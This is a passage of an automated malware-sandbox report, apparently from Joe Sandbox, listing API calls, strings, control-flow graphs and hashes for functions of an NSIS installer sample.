                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                    • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                    • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                    • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                    • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                    • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                                    Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 780 404f9e-404fb1 781 404fb7-404fca 780->781 782 40506e-405070 780->782 783 404fd5-404fe1 lstrlenW 781->783 784 404fcc-404fd0 call 406831 781->784 786 404fe3-404ff3 lstrlenW 783->786 787 404ffe-405002 783->787 784->783 788 404ff5-404ff9 lstrcatW 786->788 789 40506c-40506d 786->789 790 405011-405015 787->790 791 405004-40500b SetWindowTextW 787->791 788->787 789->782 792 405017-405059 SendMessageW * 3 790->792 793 40505b-40505d 790->793 791->790 792->793 793->789 794 40505f-405064 793->794 794->789
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                                    Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 795 402713-40273b call 406035 * 2 800 402746-402749 795->800 801 40273d-402743 call 40145c 795->801 803 402755-402758 800->803 804 40274b-402752 call 40145c 800->804 801->800 807 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 803->807 808 40275a-402761 call 40145c 803->808 804->803 808->807
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: <RM>$QuarterWalt$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                    • API String ID: 247603264-2360060177
                                                                                                                                                                                                                                                                                                    • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                    • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                                    Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 816 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 827 402223-4030f2 call 4062cf 816->827 828 40220d-40221b call 4062cf 816->828 828->827
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                    • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                                    • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                                    Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 836 405eab-405eb7 837 405eb8-405eec GetTickCount GetTempFileNameW 836->837 838 405efb-405efd 837->838 839 405eee-405ef0 837->839 841 405ef5-405ef8 838->841 839->837 840 405ef2 839->840 840->841
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                    • String ID: nsa
                                                                                                                                                                                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                    • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                                    Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 842 402175-40218b call 401446 * 2 847 402198-40219d 842->847 848 40218d-402197 call 4062cf 842->848 849 4021aa-4021b0 EnableWindow 847->849 850 40219f-4021a5 ShowWindow 847->850 848->847 852 4030e3-4030f2 849->852 850->852
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                                    Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                                    Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                                    Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
